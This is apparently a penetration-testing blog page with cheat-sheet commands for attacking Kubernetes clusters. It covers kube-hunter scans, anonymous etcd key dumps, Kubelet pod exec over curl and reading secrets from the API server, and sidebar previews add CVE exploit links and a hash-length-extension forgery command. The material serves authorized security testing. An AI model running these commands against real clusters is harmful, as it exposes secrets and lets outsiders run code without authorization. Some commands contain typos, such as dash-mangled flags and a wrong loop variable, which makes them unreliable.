Skip to main content

Kubernetes Pentest

By

    


Ports Info

Kubelet API: Port 10250: The Kubelet is the main component in every Node, all pod operations goes through the kubelet 

Etcd: Port 2379:  Etcd is a DB that stores cluster's data, it contains configuration and current state iformation, and might contain secrets   

API Server:  Port 6443:  The API server is in charge of all operations on the cluster.  
- Check API's Access 


Kube-Hunter

#Download kube-hunter from the releases 
https://github.com/aquasecurity/kube-hunter/releases

./kube-hunter 

#start active scan 
./kube-hunter --cidr 10.10.10.10 --active 

ETCD Anonymous Access

2379/tcp & 2380/tcp - etcd servers

Download etcdctl from here

etcdctl --endpoints=http://10.10.10.10:2379 get / –prefix –keys-only

for ip in $(cat kube_pods); do etcdctl --endpoints=http://$1:2380 get / –prefix –keys-only | grep -v "rpc error:"; echo "---------- testing $ip-----------" ; done

Look for Open Pods

Ports 10200 - 10259

curl -kvL https://10.10.10.10:10259/pods

#If you have access to any pods
#try EXEC
curl -skv -X POST -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" "https://localhost:10250/exec/<namespace>/<pod name>/<container name>/?command=touch&command=hello_world&input=1&output=1&tty=1"

API Server - Port 6443

works only if anonymous access is allowed or else needs to use 
Authorization: Bearer <JWT_TOKEN> header via curl

#List Secrets
curl -kL https://10.10.10.10:6443/api/v1/namespaces/default/secrets

#Show Version info
curl -k https://10.10.10.10:6443/version

#List all Secrets - Need creds
curl -k -v -H “Authorization: Bearer <jwt_token>” -H “Content-Type: application/json” https://<master_ip>:6443/api/v1/namespaces/default/secrets | jq -r ‘.items[].data’

Other Paths to check

/.well-known/oauth-authorization-server
/.well-known/openid-configuration
/healthz
/console


#install Kubectl
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"


 




Labels:

Comments

Post a Comment

Popular posts from this blog

POC Links for CVE's

By
  Serach for a CVE here first - Trickest/cve Apache CVE-2024-38475 - CVE-2024-38475 #version less than 2.4.51 CVE-2021-44790 - h ttps://www.exploit-db.com/exploits/51193 #Apache HTTP Server 2.4.50 CVE-2021-42013 - https://www.exploit-db.com/exploits/50406 use https://github.com/mrmtwoj/apache-vulnerability-testing for below CVE's CVE-2024-38472: Apache HTTP Server on Windows UNC SSRF CVE-2024-39573: mod_rewrite proxy handler substitution CVE-2024-38477: Crash resulting in Denial of Service in mod_proxy CVE-2024-38476: Exploitable backend application output causing internal redirects CVE-2024-38475: mod_rewrite weakness with filesystem path matching CVE-2024-38474: Weakness with encoded question marks in backreferences CVE-2024-38473: mod_proxy proxy encoding problem CVE-2023-38709: HTTP response splitting EXIM #suppodily should work for versions below Exim 4.96.1 - is not accurate CVE-2023-42115 - https://github.com/AdaHop-Cyber-Security/Pocy/tree/main
Post a Comment
Read more

Hash Extension Attacks

By
  #Install Dependencies sudo apt-get install libssl-dev #Download Hash Extender git clone https://github.com/iagox86/hash_extender.git cd hash_extender make #Run it /hash_extender --data 'username=admin' --secret 16 --append '&isLoggedIn=True' --signature d3a85d3b3087c7e841f84eb4316765c6e1f786074a1f1db996b2e0f8c96f197e2f55433920a630feb07daafadefbc13c947e5225fc509f8241f57f47a8df5311 --format sha512
Post a Comment
Read more